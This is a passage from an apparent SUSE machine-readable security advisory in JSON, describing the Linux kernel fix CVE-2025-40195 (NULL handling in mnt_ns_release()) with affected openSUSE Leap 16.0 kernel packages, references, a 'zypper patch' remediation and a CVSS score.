"title": "CVE-2025-40147"
},
{
"cve": "CVE-2025-40195",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40195"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmount: handle NULL values in mnt_ns_release()\n\nWhen calling in listmount() mnt_ns_release() may be passed a NULL\npointer. Handle that case gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40195",
"url": "https://www.suse.com/security/cve/CVE-2025-40195"
},
{
"category": "external",
"summary": "SUSE Bug 1253500 for CVE-2025-40195",
"url": "https://bugzilla.suse.com/1253500"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
